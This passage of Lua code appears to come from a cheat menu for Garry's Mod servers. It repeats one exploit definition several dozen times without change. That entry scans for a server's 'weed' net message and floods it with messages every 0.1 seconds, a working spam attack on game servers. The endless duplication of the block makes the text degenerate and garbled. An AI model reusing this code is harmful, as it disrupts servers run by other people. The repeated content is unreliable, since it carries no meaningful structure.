  9297. LOKI.AddExploit( "Dude Weed Lmao", {
  9298. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9299. severity = 1,
  9300. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9301. functions = {
  9302. { typ = "func", name = "Big Weed", func = function()
  9303. if !timer.Exists( "loki_bonghit" ) then
  9304. timer.Create( "loki_bonghit", 0.1, 0, function()
  9305. net.Start( "weed" )
  9306. net.WriteString( "DUDE" )
  9307. net.SendToServer()
  9308. end)
  9309. else
  9310. timer.Remove( "loki_bonghit" )
  9311. end
  9312. end, },
  9313. },
  9314. } )
  9315.  
  9316. LOKI.AddExploit( "Dude Weed Lmao", {
  9317. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9318. severity = 1,
  9319. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9320. functions = {
  9321. { typ = "func", name = "Big Weed", func = function()
  9322. if !timer.Exists( "loki_bonghit" ) then
  9323. timer.Create( "loki_bonghit", 0.1, 0, function()
  9324. net.Start( "weed" )
  9325. net.WriteString( "DUDE" )
  9326. net.SendToServer()
  9327. end)
  9328. else
  9329. timer.Remove( "loki_bonghit" )
  9330. end
  9331. end, },
  9332. },
  9333. } )
  9334.  
  9335. LOKI.AddExploit( "Dude Weed Lmao", {
  9336. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9337. severity = 1,
  9338. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9339. functions = {
  9340. { typ = "func", name = "Big Weed", func = function()
  9341. if !timer.Exists( "loki_bonghit" ) then
  9342. timer.Create( "loki_bonghit", 0.1, 0, function()
  9343. net.Start( "weed" )
  9344. net.WriteString( "DUDE" )
  9345. net.SendToServer()
  9346. end)
  9347. else
  9348. timer.Remove( "loki_bonghit" )
  9349. end
  9350. end, },
  9351. },
  9352. } )
  9353.  
  9354. LOKI.AddExploit( "Dude Weed Lmao", {
  9355. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9356. severity = 1,
  9357. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9358. functions = {
  9359. { typ = "func", name = "Big Weed", func = function()
  9360. if !timer.Exists( "loki_bonghit" ) then
  9361. timer.Create( "loki_bonghit", 0.1, 0, function()
  9362. net.Start( "weed" )
  9363. net.WriteString( "DUDE" )
  9364. net.SendToServer()
  9365. end)
  9366. else
  9367. timer.Remove( "loki_bonghit" )
  9368. end
  9369. end, },
  9370. },
  9371. } )
  9372.  
  9373. LOKI.AddExploit( "Dude Weed Lmao", {
  9374. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9375. severity = 1,
  9376. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9377. functions = {
  9378. { typ = "func", name = "Big Weed", func = function()
  9379. if !timer.Exists( "loki_bonghit" ) then
  9380. timer.Create( "loki_bonghit", 0.1, 0, function()
  9381. net.Start( "weed" )
  9382. net.WriteString( "DUDE" )
  9383. net.SendToServer()
  9384. end)
  9385. else
  9386. timer.Remove( "loki_bonghit" )
  9387. end
  9388. end, },
  9389. },
  9390. } )
  9391.  
  9392. LOKI.AddExploit( "Dude Weed Lmao", {
  9393. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9394. severity = 1,
  9395. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9396. functions = {
  9397. { typ = "func", name = "Big Weed", func = function()
  9398. if !timer.Exists( "loki_bonghit" ) then
  9399. timer.Create( "loki_bonghit", 0.1, 0, function()
  9400. net.Start( "weed" )
  9401. net.WriteString( "DUDE" )
  9402. net.SendToServer()
  9403. end)
  9404. else
  9405. timer.Remove( "loki_bonghit" )
  9406. end
  9407. end, },
  9408. },
  9409. } )
  9410.  
  9411. LOKI.AddExploit( "Dude Weed Lmao", {
  9412. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9413. severity = 1,
  9414. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9415. functions = {
  9416. { typ = "func", name = "Big Weed", func = function()
  9417. if !timer.Exists( "loki_bonghit" ) then
  9418. timer.Create( "loki_bonghit", 0.1, 0, function()
  9419. net.Start( "weed" )
  9420. net.WriteString( "DUDE" )
  9421. net.SendToServer()
  9422. end)
  9423. else
  9424. timer.Remove( "loki_bonghit" )
  9425. end
  9426. end, },
  9427. },
  9428. } )
  9429.  
  9430. LOKI.AddExploit( "Dude Weed Lmao", {
  9431. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9432. severity = 1,
  9433. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9434. functions = {
  9435. { typ = "func", name = "Big Weed", func = function()
  9436. if !timer.Exists( "loki_bonghit" ) then
  9437. timer.Create( "loki_bonghit", 0.1, 0, function()
  9438. net.Start( "weed" )
  9439. net.WriteString( "DUDE" )
  9440. net.SendToServer()
  9441. end)
  9442. else
  9443. timer.Remove( "loki_bonghit" )
  9444. end
  9445. end, },
  9446. },
  9447. } )
  9448.  
  9449. LOKI.AddExploit( "Dude Weed Lmao", {
  9450. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9451. severity = 1,
  9452. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9453. functions = {
  9454. { typ = "func", name = "Big Weed", func = function()
  9455. if !timer.Exists( "loki_bonghit" ) then
  9456. timer.Create( "loki_bonghit", 0.1, 0, function()
  9457. net.Start( "weed" )
  9458. net.WriteString( "DUDE" )
  9459. net.SendToServer()
  9460. end)
  9461. else
  9462. timer.Remove( "loki_bonghit" )
  9463. end
  9464. end, },
  9465. },
  9466. } )
  9467.  
  9468. LOKI.AddExploit( "Dude Weed Lmao", {
  9469. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9470. severity = 1,
  9471. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9472. functions = {
  9473. { typ = "func", name = "Big Weed", func = function()
  9474. if !timer.Exists( "loki_bonghit" ) then
  9475. timer.Create( "loki_bonghit", 0.1, 0, function()
  9476. net.Start( "weed" )
  9477. net.WriteString( "DUDE" )
  9478. net.SendToServer()
  9479. end)
  9480. else
  9481. timer.Remove( "loki_bonghit" )
  9482. end
  9483. end, },
  9484. },
  9485. } )
  9486.  
  9487. LOKI.AddExploit( "Dude Weed Lmao", {
  9488. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9489. severity = 1,
  9490. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9491. functions = {
  9492. { typ = "func", name = "Big Weed", func = function()
  9493. if !timer.Exists( "loki_bonghit" ) then
  9494. timer.Create( "loki_bonghit", 0.1, 0, function()
  9495. net.Start( "weed" )
  9496. net.WriteString( "DUDE" )
  9497. net.SendToServer()
  9498. end)
  9499. else
  9500. timer.Remove( "loki_bonghit" )
  9501. end
  9502. end, },
  9503. },
  9504. } )
  9505.  
  9506. LOKI.AddExploit( "Dude Weed Lmao", {
  9507. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9508. severity = 1,
  9509. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9510. functions = {
  9511. { typ = "func", name = "Big Weed", func = function()
  9512. if !timer.Exists( "loki_bonghit" ) then
  9513. timer.Create( "loki_bonghit", 0.1, 0, function()
  9514. net.Start( "weed" )
  9515. net.WriteString( "DUDE" )
  9516. net.SendToServer()
  9517. end)
  9518. else
  9519. timer.Remove( "loki_bonghit" )
  9520. end
  9521. end, },
  9522. },
  9523. } )
  9524.  
  9525. LOKI.AddExploit( "Dude Weed Lmao", {
  9526. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9527. severity = 1,
  9528. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9529. functions = {
  9530. { typ = "func", name = "Big Weed", func = function()
  9531. if !timer.Exists( "loki_bonghit" ) then
  9532. timer.Create( "loki_bonghit", 0.1, 0, function()
  9533. net.Start( "weed" )
  9534. net.WriteString( "DUDE" )
  9535. net.SendToServer()
  9536. end)
  9537. else
  9538. timer.Remove( "loki_bonghit" )
  9539. end
  9540. end, },
  9541. },
  9542. } )
  9543.  
  9544. LOKI.AddExploit( "Dude Weed Lmao", {
  9545. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9546. severity = 1,
  9547. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9548. functions = {
  9549. { typ = "func", name = "Big Weed", func = function()
  9550. if !timer.Exists( "loki_bonghit" ) then
  9551. timer.Create( "loki_bonghit", 0.1, 0, function()
  9552. net.Start( "weed" )
  9553. net.WriteString( "DUDE" )
  9554. net.SendToServer()
  9555. end)
  9556. else
  9557. timer.Remove( "loki_bonghit" )
  9558. end
  9559. end, },
  9560. },
  9561. } )
  9562.  
  9563. LOKI.AddExploit( "Dude Weed Lmao", {
  9564. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9565. severity = 1,
  9566. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9567. functions = {
  9568. { typ = "func", name = "Big Weed", func = function()
  9569. if !timer.Exists( "loki_bonghit" ) then
  9570. timer.Create( "loki_bonghit", 0.1, 0, function()
  9571. net.Start( "weed" )
  9572. net.WriteString( "DUDE" )
  9573. net.SendToServer()
  9574. end)
  9575. else
  9576. timer.Remove( "loki_bonghit" )
  9577. end
  9578. end, },
  9579. },
  9580. } )
  9581.  
  9582. LOKI.AddExploit( "Dude Weed Lmao", {
  9583. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9584. severity = 1,
  9585. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9586. functions = {
  9587. { typ = "func", name = "Big Weed", func = function()
  9588. if !timer.Exists( "loki_bonghit" ) then
  9589. timer.Create( "loki_bonghit", 0.1, 0, function()
  9590. net.Start( "weed" )
  9591. net.WriteString( "DUDE" )
  9592. net.SendToServer()
  9593. end)
  9594. else
  9595. timer.Remove( "loki_bonghit" )
  9596. end
  9597. end, },
  9598. },
  9599. } )
  9600.  
  9601. LOKI.AddExploit( "Dude Weed Lmao", {
  9602. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9603. severity = 1,
  9604. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9605. functions = {
  9606. { typ = "func", name = "Big Weed", func = function()
  9607. if !timer.Exists( "loki_bonghit" ) then
  9608. timer.Create( "loki_bonghit", 0.1, 0, function()
  9609. net.Start( "weed" )
  9610. net.WriteString( "DUDE" )
  9611. net.SendToServer()
  9612. end)
  9613. else
  9614. timer.Remove( "loki_bonghit" )
  9615. end
  9616. end, },
  9617. },
  9618. } )
  9619.  
  9620. LOKI.AddExploit( "Dude Weed Lmao", {
  9621. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9622. severity = 1,
  9623. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9624. functions = {
  9625. { typ = "func", name = "Big Weed", func = function()
  9626. if !timer.Exists( "loki_bonghit" ) then
  9627. timer.Create( "loki_bonghit", 0.1, 0, function()
  9628. net.Start( "weed" )
  9629. net.WriteString( "DUDE" )
  9630. net.SendToServer()
  9631. end)
  9632. else
  9633. timer.Remove( "loki_bonghit" )
  9634. end
  9635. end, },
  9636. },
  9637. } )
  9638.  
  9639. LOKI.AddExploit( "Dude Weed Lmao", {
  9640. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9641. severity = 1,
  9642. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9643. functions = {
  9644. { typ = "func", name = "Big Weed", func = function()
  9645. if !timer.Exists( "loki_bonghit" ) then
  9646. timer.Create( "loki_bonghit", 0.1, 0, function()
  9647. net.Start( "weed" )
  9648. net.WriteString( "DUDE" )
  9649. net.SendToServer()
  9650. end)
  9651. else
  9652. timer.Remove( "loki_bonghit" )
  9653. end
  9654. end, },
  9655. },
  9656. } )
  9657.  
  9658. LOKI.AddExploit( "Dude Weed Lmao", {
  9659. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9660. severity = 1,
  9661. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9662. functions = {
  9663. { typ = "func", name = "Big Weed", func = function()
  9664. if !timer.Exists( "loki_bonghit" ) then
  9665. timer.Create( "loki_bonghit", 0.1, 0, function()
  9666. net.Start( "weed" )
  9667. net.WriteString( "DUDE" )
  9668. net.SendToServer()
  9669. end)
  9670. else
  9671. timer.Remove( "loki_bonghit" )
  9672. end
  9673. end, },
  9674. },
  9675. } )
  9676.  
  9677. LOKI.AddExploit( "Dude Weed Lmao", {
  9678. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9679. severity = 1,
  9680. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9681. functions = {
  9682. { typ = "func", name = "Big Weed", func = function()
  9683. if !timer.Exists( "loki_bonghit" ) then
  9684. timer.Create( "loki_bonghit", 0.1, 0, function()
  9685. net.Start( "weed" )
  9686. net.WriteString( "DUDE" )
  9687. net.SendToServer()
  9688. end)
  9689. else
  9690. timer.Remove( "loki_bonghit" )
  9691. end
  9692. end, },
  9693. },
  9694. } )
  9695.  
  9696. LOKI.AddExploit( "Dude Weed Lmao", {
  9697. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9698. severity = 1,
  9699. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9700. functions = {
  9701. { typ = "func", name = "Big Weed", func = function()
  9702. if !timer.Exists( "loki_bonghit" ) then
  9703. timer.Create( "loki_bonghit", 0.1, 0, function()
  9704. net.Start( "weed" )
  9705. net.WriteString( "DUDE" )
  9706. net.SendToServer()
  9707. end)
  9708. else
  9709. timer.Remove( "loki_bonghit" )
  9710. end
  9711. end, },
  9712. },
  9713. } )
  9714.  
  9715. LOKI.AddExploit( "Dude Weed Lmao", {
  9716. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9717. severity = 1,
  9718. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9719. functions = {
  9720. { typ = "func", name = "Big Weed", func = function()
  9721. if !timer.Exists( "loki_bonghit" ) then
  9722. timer.Create( "loki_bonghit", 0.1, 0, function()
  9723. net.Start( "weed" )
  9724. net.WriteString( "DUDE" )
  9725. net.SendToServer()
  9726. end)
  9727. else
  9728. timer.Remove( "loki_bonghit" )
  9729. end
  9730. end, },
  9731. },
  9732. } )
  9733.  
  9734. LOKI.AddExploit( "Dude Weed Lmao", {
  9735. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9736. severity = 1,
  9737. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9738. functions = {
  9739. { typ = "func", name = "Big Weed", func = function()
  9740. if !timer.Exists( "loki_bonghit" ) then
  9741. timer.Create( "loki_bonghit", 0.1, 0, function()
  9742. net.Start( "weed" )
  9743. net.WriteString( "DUDE" )
  9744. net.SendToServer()
  9745. end)
  9746. else
  9747. timer.Remove( "loki_bonghit" )
  9748. end
  9749. end, },
  9750. },
  9751. } )
  9752.  
  9753. LOKI.AddExploit( "Dude Weed Lmao", {
  9754. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9755. severity = 1,
  9756. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9757. functions = {
  9758. { typ = "func", name = "Big Weed", func = function()
  9759. if !timer.Exists( "loki_bonghit" ) then
  9760. timer.Create( "loki_bonghit", 0.1, 0, function()
  9761. net.Start( "weed" )
  9762. net.WriteString( "DUDE" )
  9763. net.SendToServer()
  9764. end)
  9765. else
  9766. timer.Remove( "loki_bonghit" )
  9767. end
  9768. end, },
  9769. },
  9770. } )
  9771.  
  9772. LOKI.AddExploit( "Dude Weed Lmao", {
  9773. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9774. severity = 1,
  9775. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9776. functions = {
  9777. { typ = "func", name = "Big Weed", func = function()
  9778. if !timer.Exists( "loki_bonghit" ) then
  9779. timer.Create( "loki_bonghit", 0.1, 0, function()
  9780. net.Start( "weed" )
  9781. net.WriteString( "DUDE" )
  9782. net.SendToServer()
  9783. end)
  9784. else
  9785. timer.Remove( "loki_bonghit" )
  9786. end
  9787. end, },
  9788. },
  9789. } )
  9790.  
  9791. LOKI.AddExploit( "Dude Weed Lmao", {
  9792. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9793. severity = 1,
  9794. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9795. functions = {
  9796. { typ = "func", name = "Big Weed", func = function()
  9797. if !timer.Exists( "loki_bonghit" ) then
  9798. timer.Create( "loki_bonghit", 0.1, 0, function()
  9799. net.Start( "weed" )
  9800. net.WriteString( "DUDE" )
  9801. net.SendToServer()
  9802. end)
  9803. else
  9804. timer.Remove( "loki_bonghit" )
  9805. end
  9806. end, },
  9807. },
  9808. } )
  9809.  
  9810. LOKI.AddExploit( "Dude Weed Lmao", {
  9811. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9812. severity = 1,
  9813. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9814. functions = {
  9815. { typ = "func", name = "Big Weed", func = function()
  9816. if !timer.Exists( "loki_bonghit" ) then
  9817. timer.Create( "loki_bonghit", 0.1, 0, function()
  9818. net.Start( "weed" )
  9819. net.WriteString( "DUDE" )
  9820. net.SendToServer()
  9821. end)
  9822. else
  9823. timer.Remove( "loki_bonghit" )
  9824. end
  9825. end, },
  9826. },
  9827. } )
  9828.  
  9829. LOKI.AddExploit( "Dude Weed Lmao", {
  9830. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9831. severity = 1,
  9832. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9833. functions = {
  9834. { typ = "func", name = "Big Weed", func = function()
  9835. if !timer.Exists( "loki_bonghit" ) then
  9836. timer.Create( "loki_bonghit", 0.1, 0, function()
  9837. net.Start( "weed" )
  9838. net.WriteString( "DUDE" )
  9839. net.SendToServer()
  9840. end)
  9841. else
  9842. timer.Remove( "loki_bonghit" )
  9843. end
  9844. end, },
  9845. },
  9846. } )
  9847.  
  9848. LOKI.AddExploit( "Dude Weed Lmao", {
  9849. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9850. severity = 1,
  9851. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9852. functions = {
  9853. { typ = "func", name = "Big Weed", func = function()
  9854. if !timer.Exists( "loki_bonghit" ) then
  9855. timer.Create( "loki_bonghit", 0.1, 0, function()
  9856. net.Start( "weed" )
  9857. net.WriteString( "DUDE" )
  9858. net.SendToServer()
  9859. end)
  9860. else
  9861. timer.Remove( "loki_bonghit" )
  9862. end
  9863. end, },
  9864. },
  9865. } )
  9866.  
  9867. LOKI.AddExploit( "Dude Weed Lmao", {
  9868. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9869. severity = 1,
  9870. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9871. functions = {
  9872. { typ = "func", name = "Big Weed", func = function()
  9873. if !timer.Exists( "loki_bonghit" ) then
  9874. timer.Create( "loki_bonghit", 0.1, 0, function()
  9875. net.Start( "weed" )
  9876. net.WriteString( "DUDE" )
  9877. net.SendToServer()
  9878. end)
  9879. else
  9880. timer.Remove( "loki_bonghit" )
  9881. end
  9882. end, },
  9883. },
  9884. } )
  9885.  
  9886. LOKI.AddExploit( "Dude Weed Lmao", {
  9887. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9888. severity = 1,
  9889. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9890. functions = {
  9891. { typ = "func", name = "Big Weed", func = function()
  9892. if !timer.Exists( "loki_bonghit" ) then
  9893. timer.Create( "loki_bonghit", 0.1, 0, function()
  9894. net.Start( "weed" )
  9895. net.WriteString( "DUDE" )
  9896. net.SendToServer()
  9897. end)
  9898. else
  9899. timer.Remove( "loki_bonghit" )
  9900. end
  9901. end, },
  9902. },
  9903. } )
  9904.  
  9905. LOKI.AddExploit( "Dude Weed Lmao", {
  9906. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9907. severity = 1,
  9908. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9909. functions = {
  9910. { typ = "func", name = "Big Weed", func = function()
  9911. if !timer.Exists( "loki_bonghit" ) then
  9912. timer.Create( "loki_bonghit", 0.1, 0, function()
  9913. net.Start( "weed" )
  9914. net.WriteString( "DUDE" )
  9915. net.SendToServer()
  9916. end)
  9917. else
  9918. timer.Remove( "loki_bonghit" )
  9919. end
  9920. end, },
  9921. },
  9922. } )
  9923.  
  9924. LOKI.AddExploit( "Dude Weed Lmao", {
  9925. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9926. severity = 1,
  9927. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9928. functions = {
  9929. { typ = "func", name = "Big Weed", func = function()
  9930. if !timer.Exists( "loki_bonghit" ) then
  9931. timer.Create( "loki_bonghit", 0.1, 0, function()
  9932. net.Start( "weed" )
  9933. net.WriteString( "DUDE" )
  9934. net.SendToServer()
  9935. end)
  9936. else
  9937. timer.Remove( "loki_bonghit" )
  9938. end
  9939. end, },
  9940. },
  9941. } )
  9942.  
  9943. LOKI.AddExploit( "Dude Weed Lmao", {
  9944. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9945. severity = 1,
  9946. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9947. functions = {
  9948. { typ = "func", name = "Big Weed", func = function()
  9949. if !timer.Exists( "loki_bonghit" ) then
  9950. timer.Create( "loki_bonghit", 0.1, 0, function()
  9951. net.Start( "weed" )
  9952. net.WriteString( "DUDE" )
  9953. net.SendToServer()
  9954. end)
  9955. else
  9956. timer.Remove( "loki_bonghit" )
  9957. end
  9958. end, },
  9959. },
  9960. } )
  9961.  
  9962. LOKI.AddExploit( "Dude Weed Lmao", {
  9963. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9964. severity = 1,
  9965. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9966. functions = {
  9967. { typ = "func", name = "Big Weed", func = function()
  9968. if !timer.Exists( "loki_bonghit" ) then
  9969. timer.Create( "loki_bonghit", 0.1, 0, function()
  9970. net.Start( "weed" )
  9971. net.WriteString( "DUDE" )
  9972. net.SendToServer()
  9973. end)
  9974. else
  9975. timer.Remove( "loki_bonghit" )
  9976. end
  9977. end, },
  9978. },
  9979. } )
  9980.  
  9981. LOKI.AddExploit( "Dude Weed Lmao", {
  9982. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9983. severity = 1,
  9984. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9985. functions = {
  9986. { typ = "func", name = "Big Weed", func = function()
  9987. if !timer.Exists( "loki_bonghit" ) then
  9988. timer.Create( "loki_bonghit", 0.1, 0, function()
  9989. net.Start( "weed" )
  9990. net.WriteString( "DUDE" )
  9991. net.SendToServer()
  9992. end)
  9993. else
  9994. timer.Remove( "loki_bonghit" )
  9995. end
  9996. end, },
  9997. },
  9998. } )
  9999.  
  10000. LOKI.AddExploit( "Dude Weed Lmao", {
  10001. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10002. severity = 1,
  10003. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10004. functions = {
  10005. { typ = "func", name = "Big Weed", func = function()
  10006. if !timer.Exists( "loki_bonghit" ) then
  10007. timer.Create( "loki_bonghit", 0.1, 0, function()
  10008. net.Start( "weed" )
  10009. net.WriteString( "DUDE" )
  10010. net.SendToServer()
  10011. end)
  10012. else
  10013. timer.Remove( "loki_bonghit" )
  10014. end
  10015. end, },
  10016. },
  10017. } )
  10018.  
  10019. LOKI.AddExploit( "Dude Weed Lmao", {
  10020. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10021. severity = 1,
  10022. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10023. functions = {
  10024. { typ = "func", name = "Big Weed", func = function()
  10025. if !timer.Exists( "loki_bonghit" ) then
  10026. timer.Create( "loki_bonghit", 0.1, 0, function()
  10027. net.Start( "weed" )
  10028. net.WriteString( "DUDE" )
  10029. net.SendToServer()
  10030. end)
  10031. else
  10032. timer.Remove( "loki_bonghit" )
  10033. end
  10034. end, },
  10035. },
  10036. } )
  10037.  
  10038. LOKI.AddExploit( "Dude Weed Lmao", {
  10039. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10040. severity = 1,
  10041. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10042. functions = {
  10043. { typ = "func", name = "Big Weed", func = function()
  10044. if !timer.Exists( "loki_bonghit" ) then
  10045. timer.Create( "loki_bonghit", 0.1, 0, function()
  10046. net.Start( "weed" )
  10047. net.WriteString( "DUDE" )
  10048. net.SendToServer()
  10049. end)
  10050. else
  10051. timer.Remove( "loki_bonghit" )
  10052. end
  10053. end, },
  10054. },
  10055. } )
  10056.  
  10057. LOKI.AddExploit( "Dude Weed Lmao", {
  10058. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10059. severity = 1,
  10060. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10061. functions = {
  10062. { typ = "func", name = "Big Weed", func = function()
  10063. if !timer.Exists( "loki_bonghit" ) then
  10064. timer.Create( "loki_bonghit", 0.1, 0, function()
  10065. net.Start( "weed" )
  10066. net.WriteString( "DUDE" )
  10067. net.SendToServer()
  10068. end)
  10069. else
  10070. timer.Remove( "loki_bonghit" )
  10071. end
  10072. end, },
  10073. },
  10074. } )
  10075.  
  10076. LOKI.AddExploit( "Dude Weed Lmao", {
  10077. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10078. severity = 1,
  10079. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10080. functions = {
  10081. { typ = "func", name = "Big Weed", func = function()
  10082. if !timer.Exists( "loki_bonghit" ) then
  10083. timer.Create( "loki_bonghit", 0.1, 0, function()
  10084. net.Start( "weed" )
  10085. net.WriteString( "DUDE" )
  10086. net.SendToServer()
  10087. end)
  10088. else
  10089. timer.Remove( "loki_bonghit" )
  10090. end
  10091. end, },
  10092. },
  10093. } )
  10094.  
  10095. LOKI.AddExploit( "Dude Weed Lmao", {
  10096. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10097. severity = 1,
  10098. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10099. functions = {
  10100. { typ = "func", name = "Big Weed", func = function()
  10101. if !timer.Exists( "loki_bonghit" ) then
  10102. timer.Create( "loki_bonghit", 0.1, 0, function()
  10103. net.Start( "weed" )
  10104. net.WriteString( "DUDE" )
  10105. net.SendToServer()
  10106. end)
  10107. else
  10108. timer.Remove( "loki_bonghit" )
  10109. end
  10110. end, },
  10111. },
  10112. } )
  10113.  
  10114. LOKI.AddExploit( "Dude Weed Lmao", {
  10115. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10116. severity = 1,
  10117. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10118. functions = {
  10119. { typ = "func", name = "Big Weed", func = function()
  10120. if !timer.Exists( "loki_bonghit" ) then
  10121. timer.Create( "loki_bonghit", 0.1, 0, function()
  10122. net.Start( "weed" )
  10123. net.WriteString( "DUDE" )
  10124. net.SendToServer()
  10125. end)
  10126. else
  10127. timer.Remove( "loki_bonghit" )
  10128. end
  10129. end, },
  10130. },
  10131. } )
  10132.  
  10133. LOKI.AddExploit( "Dude Weed Lmao", {
  10134. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10135. severity = 1,
  10136. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10137. functions = {
  10138. { typ = "func", name = "Big Weed", func = function()
  10139. if !timer.Exists( "loki_bonghit" ) then
  10140. timer.Create( "loki_bonghit", 0.1, 0, function()
  10141. net.Start( "weed" )
  10142. net.WriteString( "DUDE" )
  10143. net.SendToServer()
  10144. end)
  10145. else
  10146. timer.Remove( "loki_bonghit" )
  10147. end
  10148. end, },
  10149. },
  10150. } )
  10151.  
  10152. LOKI.AddExploit( "Dude Weed Lmao", {
  10153. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10154. severity = 1,
  10155. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10156. functions = {
  10157. { typ = "func", name = "Big Weed", func = function()
  10158. if !timer.Exists( "loki_bonghit" ) then
  10159. timer.Create( "loki_bonghit", 0.1, 0, function()
  10160. net.Start( "weed" )
  10161. net.WriteString( "DUDE" )
  10162. net.SendToServer()
  10163. end)
  10164. else
  10165. timer.Remove( "loki_bonghit" )
  10166. end
  10167. end, },
  10168. },
  10169. } )
  10170.  
  10171. LOKI.AddExploit( "Dude Weed Lmao", {
  10172. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10173. severity = 1,
  10174. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10175. functions = {
  10176. { typ = "func", name = "Big Weed", func = function()
  10177. if !timer.Exists( "loki_bonghit" ) then
  10178. timer.Create( "loki_bonghit", 0.1, 0, function()
  10179. net.Start( "weed" )
  10180. net.WriteString( "DUDE" )
  10181. net.SendToServer()
  10182. end)
  10183. else
  10184. timer.Remove( "loki_bonghit" )
  10185. end
  10186. end, },
  10187. },
  10188. } )
  10189.  
  10190. LOKI.AddExploit( "Dude Weed Lmao", {
  10191. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10192. severity = 1,
  10193. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10194. functions = {
  10195. { typ = "func", name = "Big Weed", func = function()
  10196. if !timer.Exists( "loki_bonghit" ) then
  10197. timer.Create( "loki_bonghit", 0.1, 0, function()
  10198. net.Start( "weed" )
  10199. net.WriteString( "DUDE" )
  10200. net.SendToServer()
  10201. end)
  10202. else
  10203. timer.Remove( "loki_bonghit" )
  10204. end
  10205. end, },
  10206. },
  10207. } )
  10208.  
  10209. LOKI.AddExploit( "Dude Weed Lmao", {
  10210. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10211. severity = 1,
  10212. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10213. functions = {
  10214. { typ = "func", name = "Big Weed", func = function()
  10215. if !timer.Exists( "loki_bonghit" ) then
  10216. timer.Create( "loki_bonghit", 0.1, 0, function()
  10217. net.Start( "weed" )
